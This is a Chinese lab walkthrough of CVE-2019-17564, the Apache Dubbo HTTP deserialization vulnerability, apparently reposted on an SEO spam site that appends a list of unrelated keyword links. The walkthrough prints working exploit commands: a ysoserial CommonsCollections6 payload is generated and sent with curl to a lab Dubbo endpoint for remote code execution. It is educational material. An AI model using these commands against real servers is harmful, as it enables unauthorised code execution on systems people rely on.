当前位置: 首页 > news >正文

百度手机模板网站天津百度优化

百度手机模板网站,天津百度优化,自己做卖东西网站,flash使用教程漏洞描述 Apache Dubbo 是一个高性能的、基于 Java 的开源 RPC 框架。 Apache Dubbo 支持不同的协议,它的 HTTP 协议处理程序是 Spring Framework 的 .org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter Spring Framework 的安全警告显示&am…

漏洞描述

Apache Dubbo 是一个高性能的、基于 Java 的开源 RPC 框架。

Apache Dubbo 支持不同的协议,它的 HTTP 协议处理程序是 Spring Framework 的 .org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter

Spring Framework 的安全警告显示,HttpInvokerServiceExporter中存在不安全的 Java 反序列化,这可能导致 RCE 漏洞:

警告:请注意由于不安全的 Java 反序列化而导致的漏洞:纵的输入流可能导致不需要的代码 因此,不要将 HTTP 调用程序端点暴露给不受信任的客户端 因此,不要将 HTTP 调用程序端点暴露给不受信任的客户端,而仅在您自己的服务之间公开。一般来说,我们强烈建议使用任何其他消息格式(例如 JSON)。

该漏洞影响 Apache Dubbo 2.7.4 及更早版本,在 2.7.5 之后 Dubbo 替换为 .HttpInvokerServiceExportercom.googlecode.jsonrpc4j.JsonRpcServer

参考链接。

  • https://docs.spring.io/spring-framework/docs/current/javadoc-api/org/springframework/remoting/httpinvoker/HttpInvokerServiceExporter.html
  • CVE-2019-17564 : Apache Dubbo反序列化漏洞处置通告-安全客 - 安全资讯平台
  • Apache Dubbo(CVE-2019-17564)反序列化漏洞分析

漏洞环境及利用

搭建docker环境

访问8080端口

wget https://archive.apache.org/dist/zookeeper/zookeeper-3.3.3/zookeeper-3.3.3.tar.gz

tar  -xvf  zookeeper-3.3.3.tar.gz  

解压后,进入Zookeeper执行bin目录下的zkCli.sh

./zkCli.sh  -server  192.168.232.128:2181

 获取RPC接口名称

ysoserial下载链接 :下载好之后直接将文件拖至kali桌面.

https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

接着用ysoserial工具生成CommonsCollections6的Payload作为POST Body发送到http://192.168.232.128:8080/org.vulhub.api.CalcService即可触发反序列化漏洞:

java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections6 "touch /tmp/success" > 1.poc                #生成一个创建success的1.poc

curl -XPOST --data-binary @1.poc http://192.168.232.128:8080/org.vulhub.api.CalcService #将Payload作为POST Body发送到靶机.这里记得换成你靶机的IP

这个地方生成payload需要root权限,前面chmod加权限也没有用

可以看到命令执行成功

 

http://www.zhongyajixie.com/news/19832.html

相关文章:

  • 百度云盘官网登录入口在线seo短视频
  • 怎么去找做网站的品牌传播推广方案
  • 上海seo网络推广渠道广州营销seo
  • 二次开发需要源代码吗seo博客模板
  • 市住房城乡建设管理委门户网站网站快速收录的方法
  • 免费搭建个人网站王通seo赚钱培训
  • 做模具行业的网站怎么样推广自己的网址
  • 交换机做网站百度助手应用商店下载安装
  • 36氪网站是用什么做的公司要做seo
  • 网站开发服务器知识搜外seo
  • 做公司网站排名网络推广方案设计
  • 佛山网站建设公司电话杭州网站优化多少钱
  • 网站搭建骗局推广资源整合平台
  • 公司建网站一般多少钱2020年关键词排名
  • 模板设计素材淘宝优化
  • wordpress 文章背景色网站关键字优化
  • wordpress重写唐山百度提升优化
  • 自己能自学网站建设吗广州白云区新闻头条最新消息今天
  • vs2015网站开发实例seo诊断工具
  • 美女做直播网站有哪些企业站seo报价
  • 深圳网站建设效果百度认证服务平台
  • html如何做网站微信引流用什么软件好用
  • 福州网站免费制作成都网站设计
  • 企业网站建设 安全湖南长沙最新疫情
  • 可以做围棋习题的网站seo综合查询什么意思
  • 长沙市网站建设百度seo指南
  • wordpress支持自己怎么优化网站
  • 郫县哪里有做网站的常州百度推广代理公司
  • 一个网站有哪几种漏洞肇庆seo
  • 建个网站公司app开发公司排行榜